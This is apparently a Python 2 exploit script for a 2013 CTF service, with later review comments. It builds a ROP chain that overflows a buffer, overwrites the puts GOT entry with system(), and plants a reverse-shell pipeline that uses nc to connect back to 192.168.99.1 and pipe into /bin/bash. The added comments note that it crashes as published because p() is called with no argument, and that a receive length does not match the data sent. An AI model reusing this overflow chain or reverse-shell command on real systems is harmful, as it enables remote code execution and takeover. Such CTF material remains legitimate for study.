#!/usr/bin/python
# Luckyzzang (HDCON 2013 Problem 5)
#
# Two-stage ROP chain for an HDCON 2013 CTF service, written for Python 2
# (print statements, str-based byte concatenation).  Stage 1 (the triple-quoted
# string further down, currently disabled) leaks a libc address over the
# socket; stage 2 uses that address to patch the puts GOT entry with
# system_addr and to place `command` in target memory.
#
# NOTE(review): as published this file cannot run -- `p()` is called with no
# argument for puts_plt and puts_got, which raises TypeError before any socket
# is opened.  The two missing values are not on this page.
import socket, struct
# Pack / unpack one unsigned 32-bit little-endian integer.
p = lambda x: struct.pack('<L', x)
up = lambda x: struct.unpack('<L', x)[0]
# Shell pipeline the chain writes into the target process (sent NUL-terminated
# below); it connects back to 192.168.99.1 on 3334/3333.  From a defensive
# angle those two outbound connections are the most visible indicator.
command = 'nc 192.168.99.1 3334 | /bin/bash | nc 192.168.99.1 3333'
# Gadget placed after each recv@plt call; the name and the four arguments it
# has to discard suggest a pop;pop;pop;pop;ret -- confirm against the binary.
ppppr = p(0x080489cc)
# Descriptor of the client socket inside the (forked, per the gist comment)
# child process -- assumed to be 4; confirm.
sock_fd = p(4)
send_plt = p(0x08048610)
recv_plt = p(0x080485F0)
# BUG: `p` takes exactly one argument, so both of these calls raise TypeError
# at import time.  puts_plt is also never used afterwards.
puts_plt = p()
puts_got = p()
# Bytes from the start of the overflowed buffer to the saved return address
# are buffer_size + 4 (the +4 presumably covering the saved EBP).
buffer_size = 1032
# Challenge VM (private address range).
HOST = '192.168.99.133'
PORT = 7777
# Hard-coded libc puts address; presumably captured once by the disabled leak
# stage below, i.e. the script assumes the libc base is the same on every run
# (no effective ASLR on the target) -- verify before relying on it.
puts_addr = 0xb759c190
# Stage 1 (disabled): this is a bare string literal, evaluated and discarded,
# not a comment -- nothing in it runs.  Enabled, it would call
# send(sock_fd, puts_got, 4, 0) to read the puts GOT entry back over the
# socket and unpack it into puts_addr.
'''
payload = send_plt + 'AAAA' + sock_fd + puts_got + p(4) + p(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print s.recv(6)
s.send('D' * (buffer_size + 4) + payload)
puts_addr = up(s.recv(4))
print 'puts_addr = 0x%08x' % puts_addr
s.close()
'''
# system() address derived from puts via the distance between two hard-coded
# addresses -- presumably system and puts in a local copy of the same libc
# build; the offset is only valid for that exact build.
system_addr = puts_addr + 0xb7e583b0 - 0xb7e7e190
print 'system_addr = 0x%08x' % system_addr
# Writable scratch address, also expressed relative to puts; where the two
# offsets come from is not shown on this page.
my_buf = puts_addr + 0x144e70 + 0x946
print 'my_buf = 0x%08x' % my_buf
# Chain 1: recv(sock_fd, puts_got, 4, 0) -- 4 bytes read from the socket
# overwrite the puts GOT entry (fed with system_addr further down).
payload = recv_plt + ppppr + sock_fd + puts_got + p(4) + p(0)
# Chain 2: recv(sock_fd, my_buf, 4, 0).  NOTE(review): only 4 bytes are
# requested here, yet len(command) + 1 bytes are sent for it below -- the
# remaining bytes are not consumed by this call as written.
payload += recv_plt + ppppr + sock_fd + p(my_buf) + p(4) + p(0)
# Chain 3: return into send@plt with 'AAAA' as its return address and my_buf
# as its first argument.
payload += send_plt + 'AAAA' + p(my_buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# Service banner / prompt (6 bytes) before the overflow is sent.
print s.recv(6)
# Overflow: padding up to the saved return address, then the chain.
s.send('D' * (buffer_size + 4) + payload)
print 'system_addr send'
# Consumed by chain 1 (GOT overwrite).
s.send(p(system_addr))
print 'command send'
# Consumed by chain 2 (see the length note above).
s.send(command + '\x00')
print 'wait recv'
print s.recv(1024)
s.close()
AhnMo commented Apr 8, 2016

Basic ROP concept (with recv and send on a forked process)
